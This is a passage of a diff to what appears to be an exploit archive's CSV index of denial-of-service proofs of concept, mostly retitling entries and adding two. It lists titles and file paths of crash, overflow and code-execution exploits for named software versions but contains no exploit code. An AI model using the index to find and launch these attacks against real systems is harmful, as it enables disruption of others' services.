9691,platforms/windows/dos/9691.pl,"DJ Studio Pro 4.2 - '.pls' Local Crash",2009-09-15,prodigy,windows,dos,0 @@ -1354,13 +1354,13 @@ id,file,description,date,author,platform,type,port 11197,platforms/windows/dos/11197.py,"Mini-stream Ripper 3.0.1.1 - '.smi' Local Buffer Overflow (PoC)",2010-01-19,d3b4g,windows,dos,0 11209,platforms/windows/dos/11209.pl,"jetAudio 8.0.0.2 Basic - '.asx' Local Crash",2010-01-21,cr4wl3r,windows,dos,0 11214,platforms/windows/dos/11214.html,"Microsoft Windows Live Messenger 2009 - ActiveX Heap Overflow (PoC)",2010-01-21,SarBoT511,windows,dos,0 -11217,platforms/windows/dos/11217.txt,"IntelliTamper 2.07/2.08 - (defer)Remote Buffer Overflow (PoC)",2010-01-21,SkuLL-HackeR,windows,dos,0 +11217,platforms/windows/dos/11217.txt,"IntelliTamper 2.07/2.08 - Defer Remote Buffer Overflow (PoC)",2010-01-21,SkuLL-HackeR,windows,dos,0 11227,platforms/windows/dos/11227.pl,"yPlay 1.0.76 - '.mp3' Local Crash (PoC)",2010-01-22,cr4wl3r,windows,dos,0 11228,platforms/windows/dos/11228.pl,"Pico MP3 Player 1.0 - '.mp3' / '.pls' Local Crash (PoC)",2010-01-22,cr4wl3r,windows,dos,0 11233,platforms/windows/dos/11233.pl,"QtWeb 3.0 - Remote Crash (Denial of Service)",2010-01-22,"Zer0 Thunder",windows,dos,0 11234,platforms/windows/dos/11234.py,"Sonique2 2.0 Beta Build 103 - Local Crash (PoC)",2010-01-23,b0telh0,windows,dos,0 -11245,platforms/windows/dos/11245.txt,"Mozilla Firefox 3.6 - (XML parser) Memory Corruption (PoC) / Denial of Service",2010-01-24,d3b4g,windows,dos,0 -11247,platforms/windows/dos/11247.txt,"Opera 10.10 - (XML parser) Denial of Service (PoC)",2010-01-24,d3b4g,windows,dos,0 +11245,platforms/windows/dos/11245.txt,"Mozilla Firefox 3.6 - XML Parser Memory Corruption (PoC) / Denial of Service",2010-01-24,d3b4g,windows,dos,0 +11247,platforms/windows/dos/11247.txt,"Opera 10.10 - XML Parser Denial of Service (PoC)",2010-01-24,d3b4g,windows,dos,0 11248,platforms/windows/dos/11248.pl,"Winamp 5.572 - 'whatsnew.txt' Stack Overflow (PoC)",2010-01-24,Debug,windows,dos,0 11254,platforms/windows/dos/11254.pl,"P2GChinchilla HTTP Server 1.1.1 - Denial of Service",2010-01-24,"Zer0 Thunder",windows,dos,0 11260,platforms/windows/dos/11260.txt,"AIC Audio Player 1.4.1.587 - Local Crash (PoC)",2010-01-26,b0telh0,windows,dos,0 @@ -1372,7 +1372,7 @@ id,file,description,date,author,platform,type,port 11291,platforms/hardware/dos/11291.txt,"Xerox Workcenter 4150 - Remote Buffer Overflow",2010-01-30,"Francis Provencher",hardware,dos,0 11320,platforms/windows/dos/11320.pl,"Digital Amp MP3 3.1 - '.mp3' Local Crash (PoC)",2010-02-02,SkuLL-HackeR,windows,dos,0 11332,platforms/windows/dos/11332.pl,"Opera 10.10 - Remote Code Execution Denial of Service",2010-02-05,cr4wl3r,windows,dos,0 -11338,platforms/windows/dos/11338.py,"X-lite SIP 3.0 - (wav) memory Corruption Heap Buffer Overflow",2010-02-06,TecR0c,windows,dos,0 +11338,platforms/windows/dos/11338.py,"X-lite SIP 3.0 - 'wav' memory Corruption Heap Buffer Overflow",2010-02-06,TecR0c,windows,dos,0 11342,platforms/windows/dos/11342.txt,"SQLite Browser 2.0b1 - Local Denial of Service",2010-02-06,"Nishant Das Patnaik",windows,dos,0 11343,platforms/windows/dos/11343.py,"httpdx 1.5.2 - Remote Unauthenticated Denial of Service (PoC)",2010-02-07,loneferret,windows,dos,0 11347,platforms/windows/dos/11347.html,"Apple Safari 4.0.4 / Firefox 3.5.7 / SeaMonkey 2.0.1 - Remote Denial of Service",2010-02-07,"599eme Man",windows,dos,0 @@ -1397,8 +1397,8 @@ id,file,description,date,author,platform,type,port 11520,platforms/ios/dos/11520.pl,"iOS iFTPStorage 1.2 - Remote Denial of Service",2010-02-22,Ale46,ios,dos,0 11529,platforms/multiple/dos/11529.txt,"Adobe (Multiple Products) - XML External Entity / XML Injection Vulnerabilities",2010-02-22,"Roberto Suggi Liverani",multiple,dos,0 11531,platforms/windows/dos/11531.pl,"Microsoft Windows Media Player 11.0.5721.5145 - '.mpg' Buffer Overflow",2010-02-22,cr4wl3r,windows,dos,0 -11532,platforms/windows/dos/11532.html,"Winamp 5.57 - (Browser) IE Denial of Service",2010-02-22,cr4wl3r,windows,dos,0 -11533,platforms/windows/dos/11533.pl,"Nero Burning ROM 9.4.13.2 - (iso compilation) Local Buffer Invasion (PoC)",2010-02-22,LiquidWorm,windows,dos,0 +11532,platforms/windows/dos/11532.html,"Winamp 5.57 - 'Browser' IE Denial of Service",2010-02-22,cr4wl3r,windows,dos,0 +11533,platforms/windows/dos/11533.pl,"Nero Burning ROM 9.4.13.2 - ISO Compilation Local Buffer Invasion (PoC)",2010-02-22,LiquidWorm,windows,dos,0 11534,platforms/windows/dos/11534.pl,"VKPlayer 1.0 - '.mid' Denial of Service",2010-02-22,cr4wl3r,windows,dos,0 11535,platforms/windows/dos/11535.pl,"Media Player Classic 6.4.9.1 - '.avi' Buffer Overflow",2010-02-22,cr4wl3r,windows,dos,0 11536,platforms/windows/dos/11536.pl,"GOM Player 2.1.21.4846 - '.wav' Buffer Overflow",2010-02-22,cr4wl3r,windows,dos,0 @@ -1483,7 +1483,7 @@ id,file,description,date,author,platform,type,port 12109,platforms/multiple/dos/12109.txt,"Multiple Vendor 'librpc.dll' Signedness Error - Remote Code Execution",2010-04-08,ZSploit.com,multiple,dos,0 12110,platforms/windows/dos/12110.pl,"CompleteFTP 3.3.0 - Remote Memory Consumption Denial of Service",2010-04-08,"Jonathan Salwan",windows,dos,0 12131,platforms/windows/dos/12131.py,"Tembria Server Monitor 5.6.0 - Denial of Service",2010-04-09,Lincoln,windows,dos,0 -12154,platforms/php/dos/12154.txt,"vBulletin Cyb - Advanced Forum Statistics 'misc.php' Denial of Service",2010-04-10,"Andhra Hackers",php,dos,0 +12154,platforms/php/dos/12154.txt,"vBulletin (Cyb - Advanced Forum Statistics) - 'misc.php' Denial of Service",2010-04-10,"Andhra Hackers",php,dos,0 12161,platforms/windows/dos/12161.pl,"Aladdin eToken PKI Client 4.5 - Virtual File Handling Unspecified Memory Corruption (PoC)",2010-04-11,LiquidWorm,windows,dos,0 12165,platforms/multiple/dos/12165.txt,"PHP 5.3.0 - 'getopt()' Denial of Service",2010-04-12,Napst3r,multiple,dos,0 12188,platforms/multiple/dos/12188.txt,"VMware Remote Console e.x.p build-158248 - Format String",2010-04-12,"Alexey Sintsov",multiple,dos,0 @@ -1513,7 +1513,7 @@ id,file,description,date,author,platform,type,port 12336,platforms/windows/dos/12336.c,"Microsoft Windows XP/2000/2003 - 'win32k.sys' SfnLOGONNOTIFY Local kernel Denial of Service",2010-04-22,MJ0011,windows,dos,0 12337,platforms/windows/dos/12337.c,"Microsoft Windows XP/2000/2003 - 'win32k.sys' SfnINSTRING Local kernel Denial of Service",2010-04-22,MJ0011,windows,dos,0 12341,platforms/windows/dos/12341.txt,"EDraw Flowchart ActiveX Control 2.3 - 'EDImage.ocx' Remote Denial of Service (IE)",2010-04-22,LiquidWorm,windows,dos,0 -12344,platforms/hardware/dos/12344.txt,"Apple iPhone 3.1.2 - (7D11) Model MB702LL Mobile Safari Denial of Service",2010-04-19,"Matthew Bergin",hardware,dos,0 +12344,platforms/hardware/dos/12344.txt,"Apple iPhone 3.1.2 - '7D11' Model MB702LL Mobile Safari Denial of Service",2010-04-19,"Matthew Bergin",hardware,dos,0 12356,platforms/windows/dos/12356.c,"CommView 6.1 (Build 636) - Local Blue Screen of Death (Denial of Service)",2010-04-23,p4r4N0ID,windows,dos,0 12375,platforms/osx/dos/12375.c,"Apple Mac OSX 10.6 - HFS FileSystem Exploit (Denial of Service)",2010-04-24,"Maksymilian Arciemowicz",osx,dos,0 12382,platforms/multiple/dos/12382.txt,"Invision Power Board - Denial of Service",2010-04-25,SeeMe,multiple,dos,0 @@ -1544,7 +1544,7 @@ id,file,description,date,author,platform,type,port 12554,platforms/php/dos/12554.txt,"MiniManager For Mangos/Trinity Server - Denial of Service",2010-05-10,XroGuE,php,dos,0 12555,platforms/multiple/dos/12555.txt,"Pargoon CMS - Denial of Service",2010-05-10,"Pouya Daneshmand",multiple,dos,0 12564,platforms/windows/dos/12564.txt,"Microsoft Windows Outlook Express and Windows Mail - Integer Overflow",2010-05-11,"Francis Provencher",windows,dos,0 -12578,platforms/windows/dos/12578.c,"Adobe Shockwave Player 11.5.6.606 - (DIR) Multiple Memory Vulnerabilities",2010-05-12,LiquidWorm,windows,dos,0 +12578,platforms/windows/dos/12578.c,"Adobe Shockwave Player 11.5.6.606 - 'DIR' Multiple Memory Vulnerabilities",2010-05-12,LiquidWorm,windows,dos,0 12588,platforms/linux/dos/12588.txt,"Samba 3.4.7/3.5.1 - Denial of Service",2010-05-13,"laurent gaffie",linux,dos,0 12602,platforms/windows/dos/12602.txt,"Mozilla Firefox 3.6.3 / Safari 4.0.5 - Access Violation Exception and Unknown Exception",2010-05-14,"Fredrik Nordberg Almroth",windows,dos,0 12603,platforms/windows/dos/12603.py,"SmallFTPd 1.0.3 - 'DELE' Denial of Service",2010-05-14,"Jeremiah Talamantes",windows,dos,0 @@ -1586,7 +1586,7 @@ id,file,description,date,author,platform,type,port 13824,platforms/hardware/dos/13824.txt,"Office^2 iPhone - '.XLS' Denial of Service",2010-06-11,"Matthew Bergin",hardware,dos,0 13825,platforms/hardware/dos/13825.txt,"GoodiWare GoodReader iPhone - '.XLS' Denial of Service",2010-06-11,"Matthew Bergin",hardware,dos,0 13836,platforms/windows/dos/13836.py,"SolarWinds TFTP Server 10.4.0.13 - Denial of Service",2010-06-12,Nullthreat,windows,dos,0 -13837,platforms/windows/dos/13837.pl,"Media Player Classic 1.3.1774.0 - (mpcpl) Local Denial of Service (PoC)",2010-06-12,R3d-D3V!L,windows,dos,0 +13837,platforms/windows/dos/13837.pl,"Media Player Classic 1.3.1774.0 - mpcpl Local Denial of Service (PoC)",2010-06-12,R3d-D3V!L,windows,dos,0 13838,platforms/windows/dos/13838.pl,"CP3 Studio PC Version - Denial of Service",2010-06-12,chap0,windows,dos,0 13870,platforms/ios/dos/13870.py,"iOS QuickOffice 3.1.0 - HTTP Method Remote Denial of Service",2010-06-14,"Nishant Das Patnaik",ios,dos,0 13871,platforms/ios/dos/13871.py,"iOS Impact PDF Reader 2.0 - POST Method Remote Denial of Service",2010-06-14,"Nishant Das Patnaik",ios,dos,0 @@ -1693,7 +1693,7 @@ id,file,description,date,author,platform,type,port 14824,platforms/windows/dos/14824.txt,"LeadTools ActiveX Raster Twain 16.5 - 'LtocxTwainu.dll' Buffer Overflow",2010-08-28,LiquidWorm,windows,dos,0 14832,platforms/windows/dos/14832.rb,"SnackAmp 3.1.2 - '.wav' Buffer Overflow (PoC)",2010-08-29,"James Fitts",windows,dos,0 14840,platforms/windows/dos/14840.py,"Mereo 1.9.2 - Remote HTTP Server Denial of Service",2010-08-30,"CwG GeNiuS",windows,dos,0 -14843,platforms/windows/dos/14843.txt,"Apple QuickTime - '_Marshaled_pUnk' Backdoor Parameter Client-Side Arbitrary Code Execution",2010-08-30,"Ruben Santamarta",windows,dos,0 +14843,platforms/windows/dos/14843.txt,"Apple QuickTime - '_Marshaled_pUnk' Backdoor Client-Side Arbitrary Code Execution",2010-08-30,"Ruben Santamarta",windows,dos,0 14852,platforms/windows/dos/14852.txt,"LeadTools ActiveX common dialogs 16.5 - Multiple Vulnerabilities",2010-09-01,LiquidWorm,windows,dos,0 14858,platforms/windows/dos/14858.txt,"Autodesk MapGuide Viewer - ActiveX Denial of Service",2010-09-01,d3b4g,windows,dos,0 14869,platforms/windows/dos/14869.py,"Apple QuickTime FlashPix NumberOfTiles - Remote Code Execution",2010-09-02,Abysssec,windows,dos,0 @@ -1719,7 +1719,7 @@ id,file,description,date,author,platform,type,port 15017,platforms/windows/dos/15017.py,"Chalk Creek Media Player 1.0.7 - '.mp3' / '.wma' Denial of Service",2010-09-16,"Carlos Mario Penagos Hollmann",windows,dos,0 15019,platforms/windows/dos/15019.txt,"Microsoft Excel - HFPicture Record Parsing Remote Code Execution",2010-09-16,Abysssec,windows,dos,0 15193,platforms/windows/dos/15193.pl,"Hanso Player 1.3.0 - '.m3u' Denial of Service",2010-10-03,"xsploited security",windows,dos,0 -15027,platforms/windows/dos/15027.py,"Mozilla Firefox 3.6.4 - Plugin Parameter EnsureCachedAttrParamArrays Remote Code Execution",2010-09-17,Abysssec,windows,dos,0 +15027,platforms/windows/dos/15027.py,"Mozilla Firefox 3.6.4 - 'Plugin' EnsureCachedAttrParamArrays Remote Code Execution",2010-09-17,Abysssec,windows,dos,0 15032,platforms/windows/dos/15032.py,"MediaHuman Music Converter 1.0.1 - '.wav' / '.mp3' Denial of Service",2010-09-17,modpr0be,windows,dos,0 15034,platforms/windows/dos/15034.txt,"Microsoft Mspaint - '.bmp' Crash (PoC)",2010-09-18,andrew,windows,dos,0 15035,platforms/windows/dos/15035.py,"Apple QuickTime FLI LinePacket - Remote Code Execution",2010-09-18,Abysssec,windows,dos,0 @@ -1770,7 +1770,7 @@ id,file,description,date,author,platform,type,port 15334,platforms/windows/dos/15334.py,"MinaliC WebServer 1.0 - Denial of Service",2010-10-27,"John Leitch",windows,dos,0 15426,platforms/windows/dos/15426.txt,"Adobe Flash - ActionIf Integer Denial of Service",2010-11-05,"Matthew Bergin",windows,dos,0 15341,platforms/multiple/dos/15341.html,"Mozilla Firefox - Interleaving 'document.write' / 'appendChild' Denial of Service",2010-10-28,"Daniel Veditz",multiple,dos,0 -15342,platforms/multiple/dos/15342.html,"Mozilla Firefox - (Simplified) Memory Corruption (PoC)",2010-10-28,extraexploit,multiple,dos,0 +15342,platforms/multiple/dos/15342.html,"Mozilla Firefox - Simplified Memory Corruption (PoC)",2010-10-28,extraexploit,multiple,dos,0 15346,platforms/multiple/dos/15346.c,"Platinum SDK Library - post upnp sscanf Buffer Overflow",2010-10-28,n00b,multiple,dos,0 15356,platforms/windows/dos/15356.pl,"yPlay 2.4.5 - Denial of Service",2010-10-30,"MOHAMED ABDI",windows,dos,0 15378,platforms/windows/dos/15378.py,"Sybase Advantage Data Architect - '.SQL' Format Heap Overflow",2010-11-01,d0lc3,windows,dos,0 @@ -1845,9 +1845,9 @@ id,file,description,date,author,platform,type,port 15786,platforms/windows/dos/15786.py,"Accmeware MP3 Joiner Pro 5.0.9 - Denial of Service (PoC)",2010-12-20,0v3r,windows,dos,0 15787,platforms/windows/dos/15787.py,"Accmeware MP3 Speed 5.0.9 - Denial of Service (PoC)",2010-12-20,0v3r,windows,dos,0 15788,platforms/windows/dos/15788.py,"Accmeware MP3 Cut 5.0.9 - Denial of Service (PoC)",2010-12-20,0v3r,windows,dos,0 -15792,platforms/hardware/dos/15792.php,"Apple iOS Safari - (body alink) Remote Crash",2010-12-20,"Yakir Wizman",hardware,dos,0 -15794,platforms/hardware/dos/15794.php,"Apple iOS Safari - (decodeURI) Remote Crash",2010-12-20,"Yakir Wizman",hardware,dos,0 -15796,platforms/hardware/dos/15796.php,"Apple iOS Safari - (decodeURIComponent) Remote Crash",2010-12-21,"Yakir Wizman",hardware,dos,0 +15792,platforms/hardware/dos/15792.php,"Apple iOS Safari - body alink Remote Crash",2010-12-20,"Yakir Wizman",hardware,dos,0 +15794,platforms/hardware/dos/15794.php,"Apple iOS Safari - 'decodeURI' Remote Crash",2010-12-20,"Yakir Wizman",hardware,dos,0 +15796,platforms/hardware/dos/15796.php,"Apple iOS Safari - 'decodeURIComponent' Remote Crash",2010-12-21,"Yakir Wizman",hardware,dos,0 15805,platforms/hardware/dos/15805.php,"Apple iOS Safari - 'JS .' Remote Crash",2010-12-22,"Yakir Wizman",hardware,dos,0 15821,platforms/windows/dos/15821.py,"HttpBlitz Web Server - Denial of Service",2010-12-24,otoy,windows,dos,0 15839,platforms/windows/dos/15839.php,"Microsoft Windows Fax Services Cover Page Editor - '.cov' Memory Corruption",2010-12-28,rgod,windows,dos,0 @@ -2164,7 +2164,7 @@ id,file,description,date,author,platform,type,port 18637,platforms/windows/dos/18637.txt,"Oreans WinLicense 2.1.8.0 - XML File Handling Unspecified Memory Corruption",2012-03-21,LiquidWorm,windows,dos,0 18641,platforms/windows/dos/18641.txt,"Cisco Linksys WVC200 Wireless-G PTZ Internet Video Camera PlayerPT - ActiveX Control PlayerPT.ocx sprintf Buffer Overflow",2012-03-22,rgod,windows,dos,0 18643,platforms/windows/dos/18643.py,"Ricoh DC Software DL-10 SR10 FTP Server (SR10.exe) 1.1.0.6 - Remote Buffer Overflow",2012-03-22,"Julien Ahrens",windows,dos,0 -18654,platforms/windows/dos/18654.txt,"Spotify 0.8.2.610 - (search func) Memory Exhaustion Exploit",2012-03-23,LiquidWorm,windows,dos,0 +18654,platforms/windows/dos/18654.txt,"Spotify 0.8.2.610 - search func Memory Exhaustion Exploit",2012-03-23,LiquidWorm,windows,dos,0 18661,platforms/windows/dos/18661.txt,"RealPlayer - '.mp4' file handling memory Corruption",2012-03-24,"Senator of Pirates",windows,dos,0 18665,platforms/multiple/dos/18665.py,"PHP 5.4.0 Built-in Web Server - Denial of Service (PoC)",2012-03-25,ls,multiple,dos,0 18671,platforms/windows/dos/18671.pl,"KnFTPd 1.0.0 - 'FEAT' Denial of Service (PoC)",2012-03-28,"Stefan Schurtz",windows,dos,0 @@ -2204,7 +2204,7 @@ id,file,description,date,author,platform,type,port 18894,platforms/windows/dos/18894.txt,"Microsoft Windows XP - Keyboard Layouts Pool Corruption (PoC) (MS12-034)",2012-05-18,Cr4sh,windows,dos,0 18902,platforms/windows/dos/18902.rb,"Real-DRAW PRO 5.2.4 - Import File Crash",2012-05-21,"Ahmed Elhady Mohamed",windows,dos,0 18903,platforms/windows/dos/18903.rb,"DVD-Lab Studio 1.25 - '.DAL' File Open Crash",2012-05-21,"Ahmed Elhady Mohamed",windows,dos,0 -18910,platforms/php/dos/18910.php,"PHP 5.4.3 - (com_event_sink) Denial of Service",2012-05-21,condis,php,dos,0 +18910,platforms/php/dos/18910.php,"PHP 5.4.3 - 'com_event_sink' Denial of Service",2012-05-21,condis,php,dos,0 18916,platforms/windows/dos/18916.txt,"Symantec End Point Protection 11.x / Symantec Network Access Control 11.x - Local Code Execution (PoC)",2012-05-23,41.w4r10r,windows,dos,0 18918,platforms/multiple/dos/18918.txt,"Wireshark - DIAMETER Dissector Denial of Service",2012-05-24,Wireshark,multiple,dos,0 18919,platforms/multiple/dos/18919.txt,"Wireshark - Multiple Dissector Denial of Service Vulnerabilities",2012-05-24,"Laurent Butti",multiple,dos,0 @@ -2235,6 +2235,7 @@ id,file,description,date,author,platform,type,port 19085,platforms/linux/dos/19085.c,"Linux Kernel 2.0/2.1 - Send a SIGIO Signal To Any Process",1998-06-30,"David Luyer",linux,dos,0 19089,platforms/windows/dos/19089.txt,"Microsoft Windows OpenType Font - File Format Denial of Service",2012-06-12,Cr4sh,windows,dos,0 19098,platforms/multiple/dos/19098.txt,"Apple iTunes 10.6.1.7 - '.m3u' Playlist File Walking Heap Buffer Overflow",2012-06-13,LiquidWorm,multiple,dos,0 +19103,platforms/linux/dos/19103.c,"HP HP-UX 10.34 / Microsoft Windows 95/NT 3.5.1 SP1/NT 3.5.1 SP2/NT 3.5.1 SP3/NT 3.5.1 SP4/NT 4.0/NT 4.0 SP1/NT 4.0 SP2/NT 4.0 SP3 - Denial of Service",1997-11-13,"G P R",linux,dos,0 19385,platforms/windows/dos/19385.txt,"IrfanView 4.33 - '.DJVU' Image Processing Heap Overflow",2012-06-24,"Francis Provencher",windows,dos,0 19117,platforms/bsd/dos/19117.c,"Linux Kernel 2.0/2.1 (Digital UNIX 4.0 D / FreeBSD 2.2.4 / HP HP-UX 10.20/11.0 / IBM AIX 3.2.5 / NetBSD 1.2 / Solaris 2.5.1) - Smurf Denial of Service",1998-01-05,"T. Freak",bsd,dos,0 19130,platforms/freebsd/dos/19130.c,"FreeBSD 3.0 - UNIX-domain Panic (Denial of Service)",1999-05-05,"Lukasz Luzar",freebsd,dos,0 @@ -2308,6 +2309,7 @@ id,file,description,date,author,platform,type,port 19505,platforms/freebsd/dos/19505.c,"FreeBSD 3.0/3.1/3.2 vfs_cache - Denial of Service",1999-09-22,"Charles M. Hannum",freebsd,dos,0 19507,platforms/solaris/dos/19507.txt,"Solaris 7.0 - Recursive mutex_enter Remote Panic (Denial of Service)",1999-09-23,"David Brumley",solaris,dos,0 19513,platforms/hardware/dos/19513.txt,"Eicon Networks DIVA LAN ISDN Modem 1.0 Release 2.5/1.0/2.0 - Denial of Service",1999-09-27,"Bjorn Stickler",hardware,dos,0 +19531,platforms/hardware/dos/19531.txt,"Cisco IOS 12.0.2 - Syslog Crash",1999-01-11,"Olaf Selke",hardware,dos,0 19536,platforms/multiple/dos/19536.txt,"Apache 1.1 / NCSA httpd 1.5.2 / Netscape Server 1.12/1.1/2.0 - a nph-test-cgi Exploit",1996-12-10,"Josh Richards",multiple,dos,0 19541,platforms/novell/dos/19541.txt,"Novell Client 3.0/3.0.1 - Denial of Service",1999-10-08,"Bruce Dennison",novell,dos,0 19562,platforms/windows/dos/19562.pl,"MediaHouse Software Statistics Server 4.28/5.1 - 'Server ID' Buffer Overflow",1999-09-30,"Per Bergehed",windows,dos,0 @@ -2342,7 +2344,7 @@ id,file,description,date,author,platform,type,port 19716,platforms/windows/dos/19716.txt,"Checkpoint Abra - Multiple Vulnerabilities",2012-07-10,"Andrey Komarov",windows,dos,0 19720,platforms/windows/dos/19720.c,"NullSoft Winamp 2.10 - Playlist",2000-01-10,"Steve Fewer",windows,dos,0 19725,platforms/windows/dos/19725.txt,"Nosque Workshop MsgCore 1.9 - Denial of Service",2000-01-13,"Ussr Labs",windows,dos,0 -19740,platforms/windows/dos/19740.c,"Jgaa WarFTPd 1.66 x4s/1.67-3 - (CWD/MKD) Denial of Service",2000-02-03,crc,windows,dos,0 +19740,platforms/windows/dos/19740.c,"Jgaa WarFTPd 1.66 x4s/1.67-3 - 'CWD/MKD' Denial of Service",2000-02-03,crc,windows,dos,0 19744,platforms/novell/dos/19744.txt,"Novell Groupwise Enhancement Pack 5.5 Enhancement Pack - Denial of Service",2000-02-07,"Adam Gray",novell,dos,0 19746,platforms/novell/dos/19746.txt,"Novell BorderManager 3.0/3.5 Audit Trail Proxy - Denial of Service",2000-02-04,"Chicken Man",novell,dos,0 19748,platforms/windows/dos/19748.txt,"True North Software Internet Anywhere Mail Server 3.1.3 - RETR Denial of Service",2000-02-10,"Nobuo Miwa",windows,dos,0 @@ -2447,7 +2449,7 @@ id,file,description,date,author,platform,type,port 20272,platforms/windows/dos/20272.pl,"Apache 1.2.5/1.3.1 / UnityMail 2.0 - MIME Header Denial of Service",1998-08-02,L.Facq,windows,dos,0 20282,platforms/windows/dos/20282.pl,"Evolvable Shambala Server 4.5 - Denial of Service",2000-10-09,zillion,windows,dos,0 20289,platforms/windows/dos/20289.txt,"Microsoft NetMeeting 3.0.1 4.4.3385 - Remote Desktop Sharing Denial of Service",2000-10-13,"Kirk Corey",windows,dos,0 -20295,platforms/windows/dos/20295.txt,"AOL Products downloadUpdater2 Plugin - SRC Parameter Remote Code Execution",2012-08-06,rgod,windows,dos,0 +20295,platforms/windows/dos/20295.txt,"AOL Products downloadUpdater2 Plugin - 'SRC' Remote Code Execution",2012-08-06,rgod,windows,dos,0 20304,platforms/windows/dos/20304.txt,"Omnicron OmniHTTPd 1.1/2.0 Alpha 1 - 'visiadmin.exe' Denial of Service",1999-06-05,"Valentin Perelogin",windows,dos,0 20307,platforms/windows/dos/20307.txt,"Hilgraeve HyperTerminal 6.0 - Telnet Buffer Overflow",2000-10-18,"Ussr Labs",windows,dos,0 20310,platforms/windows/dos/20310.txt,"Microsoft IIS 4.0 - Pickup Directory Denial of Service",2000-02-15,Valentijn,windows,dos,0 @@ -2533,7 +2535,7 @@ id,file,description,date,author,platform,type,port 20813,platforms/multiple/dos/20813.c,"FreeBSD 2.x / HP-UX 9/10/11 / Kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (4)",1997-11-20,MondoMan,multiple,dos,0 20814,platforms/windows/dos/20814.c,"FreeBSD 2.x / HP-UX 9/10/11 / Kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (5)",1997-11-20,"Dejan Levaja",windows,dos,0 20821,platforms/hardware/dos/20821.txt,"Cisco HSRP - Denial of Service",2001-05-03,bashis,hardware,dos,0 -20824,platforms/hardware/dos/20824.txt,"Cisco Catalyst 2900 12.0 - (5.2)XU SNMP Empty UDP Packet Denial of Service",2001-05-03,bashis,hardware,dos,0 +20824,platforms/hardware/dos/20824.txt,"Cisco Catalyst 2900 12.0 - '5.2'XU SNMP Empty UDP Packet Denial of Service",2001-05-03,bashis,hardware,dos,0 20827,platforms/multiple/dos/20827.pl,"Hughes Technologies DSL_Vdns 1.0 - Denial of Service",2001-05-07,neme-dhc,multiple,dos,0 20828,platforms/windows/dos/20828.txt,"SpyNet 6.5 Chat Server - Multiple Connection Denial of Service Vulnerabilities",2001-05-07,nemesystm,windows,dos,0 20830,platforms/windows/dos/20830.txt,"T. Hauck Jana Server 1.45/1.46/2.0 - MS-DOS Device Name Denial of Service",2001-05-07,neme-dhc,windows,dos,0 @@ -2752,7 +2754,7 @@ id,file,description,date,author,platform,type,port 22081,platforms/windows/dos/22081.pl,"Mollensoft Software Enceladus Server Suite 3.9 - FTP Command Buffer Overflow",2002-12-09,"Tamer Sahin",windows,dos,0 22100,platforms/windows/dos/22100.txt,"Microsoft Internet Explorer 9 - Cross-Site Scripting Filter Bypass",2012-10-19,"Jean Pascal Pereira",windows,dos,0 22105,platforms/linux/dos/22105.c,"Linux Kernel 2.2 - 'mmap()' Local Denial of Service",2002-12-17,"Michal Zalewski",linux,dos,0 -22110,platforms/php/dos/22110.txt,"PHP-Nuke 6.0 - modules.php Denial of Service",2002-12-23,"Ing. Bernardo Lopez",php,dos,0 +22110,platforms/php/dos/22110.txt,"PHP-Nuke 6.0 - 'modules.php' Denial of Service",2002-12-23,"Ing. Bernardo Lopez",php,dos,0 22117,platforms/windows/dos/22117.txt,"iCal 3.7 - HTTP Request Denial of Service",2003-01-03,"securma massine",windows,dos,0 22118,platforms/windows/dos/22118.txt,"iCal 3.7 - Remote Buffer Overflow",2003-01-03,"securma massine",windows,dos,0 22119,platforms/windows/dos/22119.html,"Microsoft Pocket Internet Explorer 3.0 - Denial of Service",2003-01-03,"Christopher Sogge Røtnes",windows,dos,0 @@ -2828,7 +2830,7 @@ id,file,description,date,author,platform,type,port 22464,platforms/windows/dos/22464.txt,"Adobe Reader 11.0.0 - Stack Overflow Crash (PoC)",2012-11-04,coolkaveh,windows,dos,0 22467,platforms/windows/dos/22467.txt,"KMPlayer 3.3.0.33 - Multiple Vulnerabilities",2012-11-04,Mr.XHat,windows,dos,0 22483,platforms/osx/dos/22483.c,"Apple Mac OSX 10.x - DirectoryService Denial of Service",2003-04-10,"Neeko Oni",osx,dos,0 -22494,platforms/php/dos/22494.txt,"osCommerce 2.2 - product_info.php Denial of Service",2003-04-15,"Lorenzo Hernandez Garcia-Hierro",php,dos,0 +22494,platforms/php/dos/22494.txt,"osCommerce 2.2 - 'product_info.php' Denial of Service",2003-04-15,"Lorenzo Hernandez Garcia-Hierro",php,dos,0 22502,platforms/multiple/dos/22502.pl,"TW-WebServer 1.0 - Denial of Service (1)",2003-04-15,badpack3t,multiple,dos,0 22503,platforms/multiple/dos/22503.c,"TW-WebServer 1.0 - Denial of Service (2)",2003-04-16,"Shashank pandey",multiple,dos,0 22505,platforms/multiple/dos/22505.txt,"Apache Mod_Access_Referer 1.0.2 - Null Pointer Dereference Denial of Service",2003-04-16,zillion,multiple,dos,0 @@ -3019,7 +3021,7 @@ id,file,description,date,author,platform,type,port 23293,platforms/windows/dos/23293.txt,"Yahoo! Messenger 5.6 - File Transfer Buffer Overrun",2003-10-27,"Hat-Squad Security Team",windows,dos,0 23305,platforms/linux/dos/23305.c,"thttpd 2.2x - defang Remote Buffer Overflow (PoC)",2003-10-27,"Joel Soderberg",linux,dos,0 23310,platforms/windows/dos/23310.pl,"TelCondex SimpleWebserver 2.12.30210 build 3285 - HTTP Referer Remote Buffer Overflow",2003-10-29,"Oliver Karow",windows,dos,0 -23311,platforms/php/dos/23311.txt,"E107 - Chatbox.php Denial of Service",2003-10-29,Blademaster,php,dos,0 +23311,platforms/php/dos/23311.txt,"E107 - 'Chatbox.php' Denial of Service",2003-10-29,Blademaster,php,dos,0 23325,platforms/multiple/dos/23325.c,"BRS Webweaver 1.06 httpd - 'User-Agent' Remote Denial of Service",2003-11-01,D4rkGr3y,multiple,dos,0 23337,platforms/windows/dos/23337.c,"Avaya Argent Office - Malformed DNS Packet Denial of Service",2001-08-07,"Jacek Lipkowski",windows,dos,0 23339,platforms/openbsd/dos/23339.c,"OpenBSD 2.x/3.x - Local Malformed Binary Execution Denial of Service",2003-11-04,"Georgi Guninski",openbsd,dos,0 @@ -3082,7 +3084,7 @@ id,file,description,date,author,platform,type,port 23642,platforms/multiple/dos/23642.txt,"Cauldron Chaser 1.4/1.5 - Remote Denial of Service (2)",2004-02-03,"Luigi Auriemma",multiple,dos,0 23648,platforms/windows/dos/23648.pl,"Web Crossing Web Server 4.0/5.0 Component - Remote Denial of Service",2004-02-04,"Peter Winter-Smith",windows,dos,0 23654,platforms/windows/dos/23654.txt,"Xlight FTP Server 1.x - Long 